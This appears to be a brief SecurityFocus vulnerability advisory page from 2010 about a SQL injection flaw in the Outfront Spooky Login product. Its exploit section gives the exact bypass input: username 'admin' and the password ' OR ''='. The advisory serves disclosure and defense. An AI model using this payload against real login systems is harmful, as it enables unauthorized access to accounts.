info
discussion
exploit
solution
references
Outfront Spooky Login SQL Query Manipulation Password Vulnerability
The following values are to bypass authentication:
User: admin (this selects the first index from the table)
Password: ' OR ''='
Privacy Statement
Copyright 2010, SecurityFocus